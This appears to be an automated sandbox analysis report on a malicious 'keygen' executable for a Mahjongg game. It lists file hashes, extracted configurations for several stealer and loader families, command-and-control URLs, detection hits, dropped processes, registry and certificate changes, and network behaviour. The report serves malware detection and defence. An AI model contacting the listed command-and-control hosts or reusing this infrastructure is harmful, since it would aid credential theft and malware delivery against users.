Analysis
-
max time kernel
300s -
max time network
306s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 05:12
Static task
static1
Behavioral task
behavioral1
Sample
Kyodai_Mahjongg_2006_1_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Kyodai_Mahjongg_2006_1_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Kyodai_Mahjongg_2006_1_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Kyodai_Mahjongg_2006_1_keygen.exe
Resource
win10v20201028
General
-
Target
Kyodai_Mahjongg_2006_1_keygen.exe
-
Size
5.2MB
-
MD5
a438d3b681e5250cad13ffbc5a8b1e5f
-
SHA1
e8106fabc033378b3644aa34b815147a77b83539
-
SHA256
297d988321fbbbadd950e60e649f2252049e4380b5824594113ea34c13a41410
-
SHA512
9727bbfc48c98c6caab97bf782122dd18e0cad567a1e7010a827086fc2db91abe85eb23e2cab7c538d9f7f2ffc3ee37463f3ed4c46b329800d76b8b650673c40
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5436-212-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5436-211-0x0000000002590000-0x0000000002E9A000-memory.dmp family_glupteba behavioral2/memory/5436-213-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/812-144-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/812-145-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/812-172-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/812-225-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 3940 keygen-pr.exe 8 keygen-step-1.exe 1120 keygen-step-3.exe 2140 keygen-step-4.exe 3812 key.exe 2108 Setup.exe 4004 Conhost.exe 2536 setups.exe 3172 setups.tmp 1600 askinstall20.exe -
Loads dropped DLL 7 IoCs
pid Process 3172 setups.tmp 3172 setups.tmp 3172 setups.tmp 3172 setups.tmp 3172 setups.tmp 3172 setups.tmp 3172 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 309 ipinfo.io 493 ipinfo.io 141 ipinfo.io 143 ipinfo.io 183 ip-api.com 307 ipinfo.io -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 6700 4392 WerFault.exe 163 7684 9988 WerFault.exe 264 11732 5240 WerFault.exe 154 3928 5240 WerFault.exe 154 7936 5240 WerFault.exe 154 7960 5240 WerFault.exe 154 8332 5240 WerFault.exe 154 11936 5240 WerFault.exe 154 8996 5240 WerFault.exe 154 8844 5240 WerFault.exe 154 10176 5240 WerFault.exe 154 11064 5240 WerFault.exe 154 10328 5240 WerFault.exe 154 11564 5240 WerFault.exe 154 -
Delays execution with timeout.exe 3 IoCs
pid Process 6224 timeout.exe 5692 timeout.exe 6956 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 7136 taskkill.exe 8404 taskkill.exe 3748 taskkill.exe 8712 taskkill.exe 4112 taskkill.exe 5144 taskkill.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000cacba5ea64e3b4ad10c99dad0795503aaabbdf77bba36b3999d78bd6b5778f28a9e2770a7bbe37a2efd7ce976a8754e605857efa656707d0572d6ba08e960867ed266fa65312c23f657cfef711ba6666938b0daeb87391dd19a8b7b40946fc4ba0b75412587f43392dd592b27fce491c46ef9d39f168b804f067ae6cf3268400eab5b92205a50d0eb40307a9a7637645cecf3c4559e75c2fd18c265efcd8d5d0f340ffe4a3233fe187268b8df9197782654de7dd848ef56bb336c2be07fb65f1cd788228f89b2de1735f8ffd919025729f8743a36fff3a5d6585b418da2ea56c337e9cd7ffac9d3ccecc7c525a69005d279fa8cb91d82a391099d74f931385100a70851ea5f6f5aad48e55b23342aeef9eb374f1c3ba8b54f791baf44c4974723c6f2365e419777f7bc6657a0cbc59041be5f3b212468044c18f39eb806f22ff259bd91748b5d6531792ca49f677547d9d5354279d1ade8c1ab2005df827042204149b3d126a1c3ce113ae5ec413d930e31fc71a54d846db421aed004110297459fabce430d8e98e9769f1429a306ae20c689a20971e25da82b2cbd998e62db6445ab9731efb MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000004d90cf64dd61f3a437e9dedc365f075b25d9fc0161d73fafa298bc6dde20659934243f732646a6d8595c4173cad1ab73cd4cfd6b5dd88f5878ec MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{7B882280-DB51-402D-B22A-885D8F82C7BD} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000004e8e4326d8ab122a003f1f7b1bc13b9976870f576c5048b17da1f1124baaaadad79b50c443a31bf018f9f370a2b30c66154f964f21183d60b7e9f20b16f187702a66cdd5ab630941c6577ee632c11b96d4d573ae690aa8933f03 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 4088 PING.EXE 4132 PING.EXE 8960 PING.EXE 752 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 148 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 308 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 312 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 491 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 499 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 142 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3172 setups.tmp 3172 setups.tmp -
